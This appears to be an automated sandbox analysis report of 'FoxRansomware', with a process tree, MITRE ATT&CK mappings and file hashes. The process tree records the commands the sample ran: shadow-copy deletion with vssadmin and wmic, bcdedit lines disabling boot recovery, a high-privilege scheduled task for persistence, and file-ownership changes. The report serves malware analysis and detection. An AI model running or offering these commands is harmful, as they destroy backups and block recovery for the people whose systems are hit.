    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:908
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\4NgDIFJO.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2288
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\4NgDIFJO.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3728
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\9aiJ9VR3.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5504
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\9aiJ9VR3.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:1700
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1888
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:5124
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\gJlCuDYq.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4348
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"
    3⤵
    - Views/modifies file attributes
    PID:1552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db" /E /G Admin:F /C
    3⤵
    PID:3976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"
    3⤵
    - Modifies file permissions
    PID:4200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c aZQFKO51.exe -accepteula "ActivitiesCache.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4116
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\aZQFKO51.exe
      aZQFKO51.exe -accepteula "ActivitiesCache.db" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2812
    - - C:\Users\Admin\AppData\Local\Temp\aZQFKO5164.exe
        
        aZQFKO51.exe -accepteula "ActivitiesCache.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:2064

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\9aiJ9VR3.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5204
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:6104
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5712
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:3168
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:5236
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:6720

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\#ANN_README#.rtf

Filesize
8KB

MD5
ede3eeffe36241b108919b510727f24a

SHA1
6fd14fae84174215048115b12bbca50ab7d66ce2

SHA256
5b98157df84ef9e5dec21e1d157cc31512afc78d9622e4fce40642f828c440b1

SHA512
78a71d0859fbd657c01b5772f51562c36a96fbfb5f0c22988ed66e23a66a61c8656afee1e7ae2472a98c4df0b3dc3246dd5214c3a26150ab1c930d00ca6b9381

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
599a3f0c5c844d72144101e83635ea45

SHA1
8791c0a5ec7b99a1a20a100fb43f18218797ec81

SHA256
bcd7186e72a530a095af5081d5e46c4b79a828ecf8889e56a9817fde56b1fc09

SHA512
9572477877c5f6a99e7f5f1eae94a2bbac6f3900637946cc8a916419b24c3d1d7d37c745b4135f2d18886f16956bcd42c75a375cd40e59ee832d337e182ca783

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWavTkgQ.exe

Filesize
1.2MB

MD5
607d292bdcdde297252e002e613282ae

SHA1
0161d2dd582d064f7e7f50ccb43478ff0884916a

SHA256
0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65

SHA512
2bdc2ff857f9f52aac5071d3a695f7baf822a971969ba263ad03769c41af7916b558bada6bfe76fe78f730235a4ca5d2dd1cf3eaa2a59c5efef06af0a798acb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\aZQFKO51.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_3F77FA2F861E3C4B.txt

Filesize
3KB

MD5
4c16b9d03ff1f60836e30a073ce3895b

SHA1
3e095e1bccd89bd6d9de0963ff5338f839d6b4e7

SHA256
f5df42c7a3bbad6eb422f6ffa0bc3c3d5ffa0afa1d249aa895ad2cfa52fef833

SHA512
1cf3e950efd95d546e06053a23804169aa721d4d43e90d80feade253d66928d0dbf9c9a18f6d32b3ad351b18c5a9fdba2777cd5c754974244cc902297acd4870

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_3F77FA2F861E3C4B.txt

Filesize
385B

MD5
89c490f6e351ca384723ed224d8533de

SHA1
b0372123a7e55a2090ee89ed23ae3343bc012af8

SHA256
b36553415bb8331b4b4a13b9163bcc9f6dce3ccc009f8f35cd46a649def82118

SHA512
67ff8ea1c9647fb7f858f6b61bb50701c9e6b853a9e7fed368012fc8367e97141cce55ce55c02c26cc4f078eea31f985ddbf1db80fb5a7d186fea61f02183b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_3F77FA2F861E3C4B.txt

Filesize
45KB

MD5
d46f6a917d93692fe32e260d9e032725

SHA1
7d18a634696ff79e79289c08ded7a3864eee9f0e

SHA256
928eed52770f3f513da37b247cf34068ddbbf253545b01b3969832f2ffd5a565

SHA512
73db1fbe93a3ecdef72e07fa23b49e060928ee34ca4ec6b8ce19bbc245da0e9e8e6a927f75eaa2c65d4e9979a974ad1f3578cc57c3a025ad7fb518cd76ffc8da

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\gJlCuDYq.bat

Filesize
246B

MD5
9503eb9b20683cf9f6216706601b910f

SHA1
90030b25599186d9fcc3cf786aabf32279451f2c

SHA256
68b90293d620900202162bd0cde8b8dfe0badf416bdcf79dedbe496b7f558dfb

SHA512
40a6894e49c1ee3c153988d40c318b26e18e7f787ace5ecbf31400c86a3168af5ef77d41e829db4f86ab738a28d94a9d7137e7cabf36251116a00d1d382c04aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\rtoOk20O.txt

Filesize
16B

MD5
17d432845dc7cb55ac69d75cf72f7f5d

SHA1
7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3

SHA256
a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4

SHA512
25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2by0waa4.zb1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aZQFKO5164.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Roaming\4NgDIFJO.vbs

Filesize
260B

MD5
84546e55873009e09e37ff83052a2955

SHA1
c6837439d8d69d17c37dbb2585457062ade59eb9

SHA256
2352a5629ab855cb2198cfb7dcb48485d4491f8912a2853e1846f1f1d230d88f

SHA512
7968d150d10efafbaa20bebbdabe70c7d54d0c1630f5cf966010bca0d5c2d4b280051b45e0ebe0ce53ef1b73d2d050e2e34f61dae3474e7b903d1cfcba447df5

Download Submit
C:\Users\Admin\AppData\Roaming\9aiJ9VR3.bat

Filesize
265B

MD5
02c9c56dcbe01671d90806d6432750c4

SHA1
b10085f8edd2974d000b57e4f03b7238977e2338

SHA256
5a8a2522edb59cc297c9b38c93b5d6d4d0d41d9f7617264a6de36b65572f3fdf

SHA512
a15ca5f5ea99594eaec8c7c83eaf51c497f904b3156cd13e3f21e8745c99f32f2984264688f7d8c71e921148adbe9565a46f3d9a35ef85abb3ef62d306a7ed55

Download Submit
memory/640-8804-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/640-10909-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/640-10957-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/640-10978-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/640-28-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/640-11017-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/2812-5339-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2812-519-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2852-2780-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/2852-9-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/2852-10864-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/2852-8727-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/4832-27-0x00000000064C0000-0x000000000650C000-memory.dmp

Filesize
304KB

Download
memory/4832-15-0x0000000005E10000-0x0000000005E76000-memory.dmp

Filesize
408KB

Download
memory/4832-34-0x0000000073B30000-0x00000000742E0000-memory.dmp

Filesize
7.7MB

Download
memory/4832-25-0x0000000005E80000-0x00000000061D4000-memory.dmp

Filesize
3.3MB

Download
memory/4832-7-0x0000000004EA0000-0x0000000004ED6000-memory.dmp

Filesize
216KB

Download
memory/4832-14-0x0000000005DA0000-0x0000000005E06000-memory.dmp

Filesize
408KB

Download
memory/4832-30-0x0000000007AC0000-0x000000000813A000-memory.dmp

Filesize
6.5MB

Download
memory/4832-26-0x0000000006480000-0x000000000649E000-memory.dmp

Filesize
120KB

Download
memory/4832-13-0x00000000054C0000-0x00000000054E2000-memory.dmp

Filesize
136KB

Download
memory/4832-8-0x0000000073B30000-0x00000000742E0000-memory.dmp

Filesize
7.7MB

Download
memory/4832-31-0x0000000006980000-0x000000000699A000-memory.dmp

Filesize
104KB

Download
memory/4832-12-0x0000000005670000-0x0000000005C98000-memory.dmp

Filesize
6.2MB

Download
memory/4832-11-0x0000000005030000-0x0000000005040000-memory.dmp

Filesize
64KB

Download
memory/4832-10-0x0000000005030000-0x0000000005040000-memory.dmp

Filesize
64KB

Download
memory/4832-29-0x0000000005030000-0x0000000005040000-memory.dmp

Filesize
64KB

Download